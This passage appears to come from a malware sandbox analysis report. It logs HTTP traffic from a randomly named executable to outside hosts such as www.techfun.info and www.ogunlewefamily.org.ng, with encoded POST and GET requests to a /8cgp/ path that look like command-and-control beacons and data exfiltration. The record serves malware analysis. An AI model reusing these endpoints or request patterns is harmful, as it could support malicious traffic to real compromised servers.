YIPfn7+qpFF/9WgxHrGPqQqaYjCgzRd6Vh//W5MaoIctEJAFj+hlGIwX7s7Hx90to0Kyc700LOcgGwE+yQZvJz6Z1DeTHQxj/9MUsOWAJwLXGoRS9nl/FQKkhCrpfGyeHYEOtjgji5Hhnk7hzJFCZjT5COvbzhU0hH0hHQzLvxZzKPg9R1iVuXc97WNBTvgLiFwc9hAdlqva34lfSUs5O6eDkAp12j1YsiHFJ5AyQJelVAT8iBTg5YFGQqfbYqMXTzhdeUZM7PrJGoe3C8Wc3o0cwDQgiaFT/uqJ+1LmEjEaAU5DxCXkbLGk+MA5C+j9byb8woGw/WhOrpm9z7FVYEA1EWygYpBLK8qOhCTuZrBM9OxKwlOshLXtt50qLswyYrJ5o1TGKhsn1NG1dqO3VHasBCQ+n2hvFUiNhD0fcJhHfdMQyU3rUtJ2hJC+8mCDM0TJdytn2/aA1xRV+EZkRXYSa8Vm3WjBwbAbwH+3ZVFl7vhy9x36YhVR0+yTCHTBYMwyLxB9537j0+PrCZTx7qTCky7o80/MOM79EuipnN3qEz3kg/BvUxvRy6gPH1CKrOaRvxXkk3EiPqqrVAD7dRbnHblt0TirqZ6HdXM+wbIyzA5VvyoWOXWGSUbM2kwN8qFHCzgiu9L+NNuPncqBNbDJawRsvF1nfHJFc1F5SOU52O1UcvMi1mGOnH4id1/8sRdSbWT1uED1xwV1touS21VlJqyFTduFkOmUBK6SG2VQCjFzYSZx+NLrCj7AOsb0Rt3xzHNzaC5diWd5/zTFHZc4Uu1GTvfNHkUCIQJVbHLsNDQh1XbiR8pz+El6ERl3MLw2QpvWAQgAZNN8FGUzyyWL9KlRcho6tcZVvPDbPDNvI1uhVqEP5GuFxsp9H4aeGLNCxzWcYpDucgo6DL+S5am9ZIUxAR4J6kCvCj+J/V9T2qqKJ3gq5FFpLALPYe5wLcmTrQKjGw0O6hLYgRhVXDmnSVfRP4v8kZzWwkDYKGjs83VMbH/Xh3hrspXoj4t9xmEE95idHYqDBPf6X0+3jRLBgSdpwO5tZ6dE6EejoQtnCI3/ovCevioaoa/WP8dmzQ4KXQ4aUhyA6jB1GQJRUC8BI9hGtx2v18ojSOmXyDp7GoyceW16CH/HxftrIVW4CexgJeiRAdkZHM8zbxpZSNnplcJA1UrPwWTtpdDDwd3w1wbBbWs2YhBN0Lvya7rHX2c8sFhjAFsTzc9QAxxDFJaqXcHH5k/cMO5K61MO9wtCq2zL1cjiFOBlEWMeuAgTieJjVtWkFKGBR7BGuq15NpmHuH9+x7Fh5bZRGjZo47UzMo9xbpZ1anNWx0+12xO0CX/BsJhspU4Pr+NYfryE/HvKX1fcMjpDOhwlDW7VlhNsYUKOCkCe59x6RDjITPlSbnBQpeFwyQoBVLrxRUHbsrQpP4V/0TYi1ppNiWLaJy/eAMq3Vd49q3bf37sJnRd4zQH4KiJ73L6nWfVptlzXzPgfZar/W62w4aCazuQIflWb0vs0u0DiuHdY3XEc0IP9NCSfs9OK3XO9iagfKQQqwIu8mVYfsHr9RrjjqTpgLqWj1AHQs+CprQJvv130Pbz8ErsBfte1ouvU3Y6R+1uKnjvof37eLA88ye7PiLEmVe0/zlF3klLs2kbiiynUa+2D/hu2jFaysru0fh37rjZ0GVYGo40T3Fw6/E+bi2ZuLJkEidLnFg4VNCob17V/H59xnisTwVJXU3+TRvRy6Aol7+McA2ikLwDJkmXbtWQX5BDm+P17JxQUQqm+7FzldWWaQO8Tc
                                                                    Apr 24, 2024 12:30:03.054053068 CEST6445OUTData Raw: 46 6a 64 78 4c 42 65 6a 34 65 6e 6a 76 43 68 45 70 68 2f 4f 6b 59 47 6d 57 77 68 72 4e 74 6e 64 70 6e 4f 44 66 6a 49 47 39 38 63 6e 75 74 37 46 76 41 4f 36 65 32 44 31 42 4a 34 4f 66 67 43 75 39 2b 71 75 36 48 64 6e 72 72 5a 34 30 70 47 49 6d 50
                                                                    Data Ascii: FjdxLBej4enjvChEph/OkYGmWwhrNtndpnODfjIG98cnut7FvAO6e2D1BJ4OfgCu9+qu6HdnrrZ40pGImPFv438M/2Bf/7SZD4Nn2HrmXOt6wQzVXo6eXM7YKowMsBcXuwCvtBWSBJcmnX+06QIcfTTWeOVty9kafqtJv41djoIdej3MXfelvS11S1OdCGdvZUPIxLC7cvH/SevrOMFdctrcfi9Z8OFKBPE+AtXgxXLBr6f17x2
                                                                    Apr 24, 2024 12:30:03.054099083 CEST2578OUTData Raw: 44 49 50 6c 78 73 45 39 4e 58 70 65 71 77 71 72 64 55 69 6c 59 77 53 32 65 58 63 34 49 54 72 54 55 50 48 34 4a 45 43 6c 46 64 46 75 65 63 78 68 61 78 67 65 33 34 42 69 31 2b 4b 6c 35 6f 76 43 62 66 37 68 57 6a 57 63 63 7a 46 38 46 56 61 38 78 74
                                                                    Data Ascii: DIPlxsE9NXpeqwqrdUilYwS2eXc4ITrTUPH4JEClFdFuecxhaxge34Bi1+Kl5ovCbf7hWjWcczF8FVa8xtcRtqD3tuebra5LUJHUUKed8ZgPf8hzSfbcE5DIwWrfe58N2huQYBaXOZtq2/KCMCbdXpAm+poYkPqOnDdFQeaGJdOw5g0Iz0lGGf9gOfywfJojb3X5pdnTcQ/CCGOMX4T6IqV64/C2xOmDWXuudiv8xtG8+UAldxq
                                                                    Apr 24, 2024 12:30:03.231410027 CEST5156OUTData Raw: 54 33 71 39 79 44 59 71 4c 7a 36 6a 4a 76 54 6f 69 74 48 5a 66 44 51 42 4c 6a 62 6d 4e 64 5a 4e 4c 33 2f 7a 4f 50 31 4b 71 53 7a 63 58 68 41 74 62 4a 79 58 32 6e 6a 36 4d 46 44 65 43 51 5a 42 71 4b 47 45 31 68 79 4a 42 58 31 42 61 52 59 64 68 6a
                                                                    Data Ascii: T3q9yDYqLz6jJvToitHZfDQBLjbmNdZNL3/zOP1KqSzcXhAtbJyX2nj6MFDeCQZBqKGE1hyJBX1BaRYdhjiAVJ87e2S0beX3RPFLn5iIAYt/rGHUwNOeg6nedSAEJe7xNBVc1xFm5lzSuRmsODYsYTeNchhrD8zIvXJEuqOZy+kp8SdahCDpih4BEXZUNoC3qLmIujnmmr1/eVC8ljvcCerhVH0KfvIXdAQAZCM3lhWLaYgVcXN
                                                                    Apr 24, 2024 12:30:03.231679916 CEST15468OUTData Raw: 45 79 48 69 45 72 77 50 48 76 78 4f 36 65 41 4b 61 42 61 38 51 45 44 48 48 30 71 6b 74 57 50 49 79 30 6e 42 79 44 66 4c 6a 76 51 43 42 6d 53 38 4c 61 4a 76 55 77 6b 52 55 4d 36 6e 59 4d 39 2b 4c 2b 57 56 64 79 32 79 79 61 5a 38 6d 65 69 42 43 52
                                                                    Data Ascii: EyHiErwPHvxO6eAKaBa8QEDHH0qktWPIy0nByDfLjvQCBmS8LaJvUwkRUM6nYM9+L+WVdy2yyaZ8meiBCRDcfFiPW3RfHvOy8UvyRMAMs1DjGcZzdNBUz/Oy5ujGHygg1dKwAgX/pFelnuDbZ0X85NYHiSuIC8X6zb2QiMHuqv0JI6Jpe1re8E6LuUHZEs/2hVvONEA29fZ2g1Ao1O23wIu/EG0deSjRc+r2WUk7bBMBrkZJvzU
                                                                    Apr 24, 2024 12:30:03.232146025 CEST1289OUTData Raw: 37 33 6f 45 63 77 39 6e 6c 71 4d 73 7a 4a 4c 68 49 39 45 6a 67 5a 77 6e 59 67 66 57 73 4d 30 6d 6b 48 39 6b 32 36 56 36 52 37 64 47 2f 6c 41 32 33 5a 4c 76 42 76 55 72 72 48 73 2f 32 52 51 7a 2b 4e 61 57 33 75 4a 50 72 79 48 6d 76 38 47 55 69 56
                                                                    Data Ascii: 73oEcw9nlqMszJLhI9EjgZwnYgfWsM0mkH9k26V6R7dG/lA23ZLvBvUrrHs/2RQz+NaW3uJPryHmv8GUiVneBy8hUTyRE6AcQuH44Wk5zYckTjQTr9TvCss0Ti6nnepxIyMCRIhYIYVIvFgDLpObtPU/whZ+qdqmP+CRpCsSiJo8y6brfGFvz0zNaTUUpeDUMRprL29pCNMxNGUEGvTrw8xQCuXV0NKhlXTHJjSB2TqUJqV3QDS
                                                                    Apr 24, 2024 12:30:03.232198954 CEST3867OUTData Raw: 47 41 57 54 65 74 47 65 35 46 79 41 53 58 31 43 69 31 72 30 53 52 53 61 4f 31 58 76 4a 62 32 6b 69 53 57 64 72 65 47 61 61 74 71 6b 41 7a 75 66 79 64 61 6f 76 4d 32 34 38 69 5a 6f 4c 4f 74 66 5a 33 75 48 41 49 6e 6a 59 57 52 50 54 37 79 70 6b 2b
                                                                    Data Ascii: GAWTetGe5FyASX1Ci1r0SRSaO1XvJb2kiSWdreGaatqkAzufydaovM248iZoLOtfZ3uHAInjYWRPT7ypk+UTRnTLwH9sDVD+0/9uiqlmpLdApdwem8OC+tmwlmmlqoIU81fu4oTbg2FvhReI38o0qP10DZHsJ8IvYM7KfSal6/UqH6aWO3chQk7NeiQ8ayJak8ILlJw+L3jnYA9Pm6zO6VpIZIr9yzVUaPLJIFxbCHkSuBZxApX
                                                                    Apr 24, 2024 12:30:03.408809900 CEST5156OUTData Raw: 51 58 63 59 78 62 74 46 48 39 31 66 52 44 67 75 4a 71 68 39 52 56 71 4f 41 4a 48 76 36 66 47 59 38 4f 77 33 47 32 33 47 68 79 55 6d 52 30 6c 53 68 64 76 6f 61 4b 6b 54 46 4c 2f 71 6d 67 2f 45 63 77 45 73 55 36 70 57 71 78 2f 65 6a 36 44 6c 36 6f
                                                                    Data Ascii: QXcYxbtFH91fRDguJqh9RVqOAJHv6fGY8Ow3G23GhyUmR0lShdvoaKkTFL/qmg/EcwEsU6pWqx/ej6Dl6o841WvS+hNp26obX1TnGI/gZe3CsM/iQPiGSFLwNIVbEG+MMTBVQJ0BBQUSMMKSouleU8kOTXdgtc+OYHi8OwndtmzjGsKgXbo9BsDNVqZL9vzEA9fDSurKmNgq+nJyl0GkGpCCFrifcNs6hb5Bl1hnCRAcHEERWep
                                                                    Apr 24, 2024 12:30:03.409076929 CEST2578OUTData Raw: 62 42 49 51 30 54 69 70 76 47 4d 4e 4f 32 38 61 46 74 34 6f 31 55 35 6d 79 63 55 42 51 6a 64 37 2f 72 30 77 76 58 68 6f 50 6e 56 75 6b 7a 73 6f 43 77 72 57 4b 48 7a 75 31 66 75 75 67 39 65 67 4d 66 34 31 31 71 76 6d 30 43 43 71 31 4c 34 37 74 43
                                                                    Data Ascii: bBIQ0TipvGMNO28aFt4o1U5mycUBQjd7/r0wvXhoPnVukzsoCwrWKHzu1fuug9egMf411qvm0CCq1L47tCBODIHyg0uPVHpX+Mk1ztffBUGM643kmASfWX129WeFPNQ5j7XY4jEF+cn73tFV1hZ6M/pfBEj5OuK+4EVCIQGwJ7/q4fwga0dD9bCRi7q2dsusn6cVOkkOGD37isihMr3KdvFhbubWnz9rJAP1iJz6ndgk6DDTPhZ
                                                                    Apr 24, 2024 12:30:03.409348011 CEST6992OUTData Raw: 53 6f 4e 6f 47 55 45 72 7a 53 46 73 44 63 44 5a 63 6a 35 52 64 56 78 47 51 4e 63 6b 41 2f 43 57 75 36 5a 6d 2f 6f 43 52 34 2f 43 34 58 66 48 38 49 48 43 31 54 58 74 59 41 63 51 73 4d 54 6a 53 43 6e 54 35 48 55 69 64 76 42 65 2f 6e 74 4e 68 58 43
                                                                    Data Ascii: SoNoGUErzSFsDcDZcj5RdVxGQNckA/CWu6Zm/oCR4/C4XfH8IHC1TXtYAcQsMTjSCnT5HUidvBe/ntNhXCPGcwdNaF3PASjT+vo7hUNra6s1PyTyUxF2SMoSQr19RdXkSOCTgQ+WHwo4DTmqNM5hAbsSbIv88gEA3kFQbEqaakKeL5A4BOn59iL0VA1wf3hMxq1TrnFmmwics0MlFm8Nkb4WhKsqldK5Te4JYTzFlWdM1oOGUlh
                                                                    Apr 24, 2024 12:30:04.704473019 CEST533INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:03 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.11.2050269203.161.49.193807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:05.756561041 CEST389OUTGET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.techfun.info
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:06.017165899 CEST548INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:05 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.11.205027067.225.140.26807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:11.664141893 CEST686OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.ogunlewefamily.org.ng
                                                                    Origin: http://www.ogunlewefamily.org.ng
                                                                    Referer: http://www.ogunlewefamily.org.ng/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 44 6b 75 53 66 50 4f 37 4a 7a 70 48 77 45 38 73 7a 70 63 38 30 75 43 54 43 70 53 76 55 56 6e 37 35 51 64 4d 33 67 54 50 51 71 50 38 61 33 78 77 35 44 72 67 5a 79 50 67 52 4a 33 41 53 2f 38 79 32 2b 32 33 63 75 4d 4f 33 55 59 39 41 52 64 34 67 6d 36 6f 70 51 2f 32 71 6e 36 4c 68 33 38 69 45 73 4c 4c 2f 6b 47 67 52 41 62 5a 4d 34 61 7a 6e 39 34 6c 32 4e 6b 48 4d 71 5a 2b 33 77 78 41 42 32 77 48 34 61 43 31 37 52 71 78 74 49 4f 4e 4f 47 45 6f 41 4c 30 51 6f 66 4a 4f 67 53 2b 33 2b 62 30 36 37 70 35 33 37 45 2f 78 46 33 6a 65 4d 59 6c 41 6e 6b 6b 68 2b 69 50 70 51 69 73 6e 52 77 3d 3d
                                                                    Data Ascii: Xh9lX=DkuSfPO7JzpHwE8szpc80uCTCpSvUVn75QdM3gTPQqP8a3xw5DrgZyPgRJ3AS/8y2+23cuMO3UY9ARd4gm6opQ/2qn6Lh38iEsLL/kGgRAbZM4azn94l2NkHMqZ+3wxAB2wH4aC17RqxtIONOGEoAL0QofJOgS+3+b067p537E/xF3jeMYlAnkkh+iPpQisnRw==
                                                                    Apr 24, 2024 12:30:12.210313082 CEST1289INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:11 GMT
                                                                    Server: Apache
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Encoding: gzip
                                                                    Content-Length: 7038
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 3d 6b 73 db 46 92 9f a5 5f 01 c1 15 8b dc 00 20 08 3e f4 a4 52 b2 2c 3b de 8d 2d 97 2c 5f 6e 2b 4e a9 40 60 48 c2 06 01 04 00 f5 58 45 3f e8 fe c6 fd b2 eb 9e 19 bc 07 24 24 4a d9 6c 8e 65 53 c4 4c 4f 77 4f bf a6 e7 45 1e 6e bd 3e 3b b9 f8 e7 c7 53 69 16 cf dd a3 cd 43 fc 23 b9 a6 37 1d c9 c4 53 3f 7f 92 b1 8c 98 f6 d1 a6 04 af c3 39 89 4d 00 8d 03 95 fc b6 70 ae 46 f2 89 ef c5 c4 8b d5 8b db 80 c8 92 c5 9e 46 72 4c 6e e2 0e e2 3a 90 ac 99 19 46 24 1e 7d be 78 a3 ee ca 79 3c 9e 39 27 23 f9 ca 21 d7 81 1f c6 b9 d6 d7 8e 1d cf 46 36 b9 72 2c a2 d2 07 45 72 3c 27 76 4c 57 8d 2c d3 25 a3 ae a6 27 a8 5c c7 fb 26 85 c4 1d c9 81 e3 4d c7 a6 f5 4d 96 66 21 99 8c 64 e4 73 bf d3 f1 a7 0b cf 25 d7 64 62 ce 1d f7 56 f3 c3 a9 e6 4d 3b 37 73 37 0c 2c 2d 98 05 09 a2 d8 89 5d 72 f4 d1 9c 12 c9 f3 63 69 e2 2f 3c 5b 7a f9 62 d7 e8 76 0f a4 33 8e 44 7a 43 b1 1c 76 18 f4 66 ae 27 db a1 3f f6 e3 68 3b ed c7 f6 dc bc 51 9d 39 20 54 83 90 60 3f f7 5d 33 9c 92 6d a9 03 0d 53 be b7 6d 2f 42 80 09 89 ad d9 36 e3 7d bb 86 ed 66 4d 27 c0 40 a4 4d 7d 7f ea 12 33 70 22 cd f2 e7 a5 96 b2 e9 c6 24 f4 cc 18 b4 16 83 ee a0 20 08 5c c7 32 63 c7 f7 3a 61 14 7d 0f 02 82 2a ec e5 48 2e f5 5e 7a 19 9a bf 2d fc 03 e9 0d 21 76 5e da 51 ad b8 27 00 d9 91 9f 83 87 13 7f 3e 07 69 47 0f 60 c6 e2 4d f2 5c 45 56 e8 04 31 e7 83 9a ef 57 f3 ca 64 a5 60 21 9d bf 49 87 5b bf 9c bc 3e be 38 fe 45 fa 5b 67 f3 da f1 6c ff 5a bb bc 0e c8 dc ff ea 7c 22 71 0c d6 17 49 23 e9 4e 1e 9b 11 f9 1c ba f2 3e 67 e3 4b e7 4b 27 d2 ae 91 fa 97 0e b5 87 e8 0b f0 10 92 2f 1d da f8 4b a7 3b d0 74 ad f7 a5 b3 63 dc ec 18 5f 3a b2 22 03 03 d0 5e 0b bc 29 3c 44 57 d3 c7 e1 83 86 14 1b fc 3d 65 08 e1 13 3e fb 8b d0 22 f2 fe 9d 0c b6 0a f2 a6 cd 38 7e 8a 5e 28 b7 2f 9d eb 40 75 3c cb 5d d8 48 f1 6b 44 0b 68 5b 15 f4 49 a0 db da dc f1 b4 af d1 0f 57 24 1c 0d b5 81 66 c8 f7 f7 07 20 bc 2d e9 62 e6 44 d2 c4 71 89 04 7f cd 45 ec ab 53 e2 91 10 68 db 28 cf ad c9 c2 b3 50 ef 2d 47 f1 da 77 57 66 28 f9 4a a4 90 83 a4 5c b2 5a a4 7d 17 87 b7 b4 2e 1e dd 45 8b 00 c3 c6 05 89 e2 68 9f 28 b1 33 87 4f e6 3c d8 6f 79 e4 5a 7a 0d 88 db da 95 e9 2e c8 d9 a4 d5 be 3f 88 48 14 01 9a 4f b1 1f 82 c0 34 88 48 ef a0 db 2d 5f f9 fb a7 b3 0f 5a 14 87 a0 3e 67 72 db 8a db ed 7b 90 88 35 43 72 f7 f7 29 f9 a0 05 34 90 35 a2 59 d0 d5 f0 9c 58 71 4b 57 74 05 9e 4d 0f 2c 45 63 81 2a 7d 9c 11 67 3a 8b db 50 00 bd 76 2f 40 a1 ad 18 c0 f5 f6 01 eb 00 72 f9 d9 f1 e2 9e 71 1c 86 e6 6d 8b 68 53 e0 09 b5 09 bc 9b 4d 50 6b 36 00 b6 95 70 d4 5a 83 27 8f f2 a4 3c 15 37 ed 83 90 c4 8b d0 93 62 8d 80 11 dc b6 52 bd 82 f8 da 77 bc 92 8c 46 a3 f0 97 f8 d7 fb 76 26 e0 45
                                                                    Data Ascii: =ksF_ >R,;-,_n+N@`HXE?$$JleSLOwOEn>;SiC#7S?9MpFFrLn:F$}xy<9'#!F6r,Er<'vLW,%'\&MMf!ds%dbVM;7s7,-]rci/<[zbv3DzCvf'?h;Q9 T`?]3mSm/B6}fM'@M}3p"$ \2c:a}*H.^z-!v^Q'>iG`M\EV1Wd`!I[>8E[glZ|"qI#N>gKK'/K;tc_:"^)<DW=e>"8~^(/@u<]HkDh[IW$f -bDqESh(P-GwWf(J\Z}.Eh(3O<oyZz.?HO4H-_Z>gr{5Cr)45YXqKWtM,Ec*}g:Pv/@rqmhSMPk6pZ'<7bRwFv&E
                                                                    Apr 24, 2024 12:30:12.210330009 CEST1289INData Raw: 22 e0 e8 da 41 f1 03 b4 05 16 25 4f 5c 73 2a ef f3 86 88 46 fe b2 b0 77 7b 16 bc 4f 26 bd 2f 8b 09 d1 27 5f 16 86 ae db f0 3e 34 77 58 89 5c 0b 36 2e 80 b5 7f d8 ea ee 6f 15 d1 da 13 33 f7 b9 27 97 ab 18 92 1c 40 fb e5 cb ad 32 67 7d 78 1f f7 75
                                                                    Data Ascii: "A%O\s*Fw{O&/'_>4wX\6.o3'@2g}xux;F wJ=sR2xt\Om3,=>INds o0g?F?6O/#N #,!hgoBj+w4(qZ2df5a
                                                                    Apr 24, 2024 12:30:12.210355043 CEST1289INData Raw: fc 01 37 fb d2 0b 9d be 0e 84 30 d6 ad e9 01 e0 c2 89 66 ea 34 44 37 7d 61 8e c7 bb 56 4f 0c 7e 3d 73 62 02 30 13 fa 12 c3 04 a6 4b d4 00 74 88 70 3b bb b6 b9 23 86 bb 72 ae 1c 5b 0d 09 38 d2 0b 6b 62 10 83 88 e1 dc 05 18 ad bf 88 78 03 10 9e 37
                                                                    Data Ascii: 70f4D7}aVO~=sb0Ktp;#r[8kbx7e<Ujcb:Mq}' HsT|gl[20wK%vwb-{=R,EK}:lXDfiV7Tc5T0vn[Vw0PvPoK]]]K,v^[]:0ISbJ
                                                                    Apr 24, 2024 12:30:12.210366964 CEST1289INData Raw: cd 02 ba 8d f7 fc 9a d8 a1 60 ab 6e 2d 96 9a 10 68 ea 8f 75 9b 78 eb 31 f8 10 4a 8d 63 55 7e 8f ef 29 d9 13 a0 17 d9 d8 ea ad bf f5 ec 6c 35 7e d1 18 2a da 11 5c 8b 0f 21 46 61 3e 50 de cb 5b 8b 6c 15 5d 2d cd 64 47 ef 09 e8 25 a8 96 d9 20 ee e1
                                                                    Data Ascii: `n-hux1JcU~)l5~*\!Fa>P[l]-dG% =!8O"(nEJ@+[JDnegw#_vp;i;Gc+gJTIfaO13hY89[%,99mwHITjf*TWZ
                                                                    Apr 24, 2024 12:30:12.210479021 CEST1289INData Raw: 20 bf 0b 7d 4c 73 28 f4 51 ca 26 ff 4e a4 3a f1 80 c4 63 32 57 07 7d 5d 2e 34 c1 d7 32 8a d8 4a aa c7 a7 ba e4 0a 04 a3 4b b4 8e 02 a7 9f 54 4c d5 e8 d2 c9 25 7e ca 55 b0 fb ef 2a 8e 68 b9 d2 99 3f 27 55 e6 58 67 e9 f2 11 04 25 0c fb 68 35 65 a8
                                                                    Data Ascii: }Ls(Q&N:c2W}].42JKTL%~U*h?'UXg%h5e_EF;+'R-j%,Y|#RhW%:`Dmij6yjr#xOb`oslum2;0{<n4^<b'u}OSd8OO,#qD
                                                                    Apr 24, 2024 12:30:12.210596085 CEST1004INData Raw: e0 60 92 34 f3 05 5e 2e 66 38 56 86 57 24 94 2c d3 c3 fb 2e 7b 07 31 24 97 20 bc 18 aa 68 80 ba f5 17 12 fd 95 9d 28 26 b6 26 5d 24 e5 10 dc 25 e2 00 58 08 f4 70 08 f1 af 88 8d 27 71 4d c9 76 26 13 12 e2 b1 65 9c e5 d2 6b 82 60 f2 36 c1 dc d8 56
                                                                    Data Ascii: `4^.f8VW$,.{1$ h(&&]$%Xp'qMv&ek`6V3"'avZR)xu|?=x?XjG@ja*5J!Ha3am2K"K8rYIJ>\tbEW]wr-279;`7:Q9{dGt 509


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.11.205027167.225.140.26807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:14.427356958 CEST1026OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.ogunlewefamily.org.ng
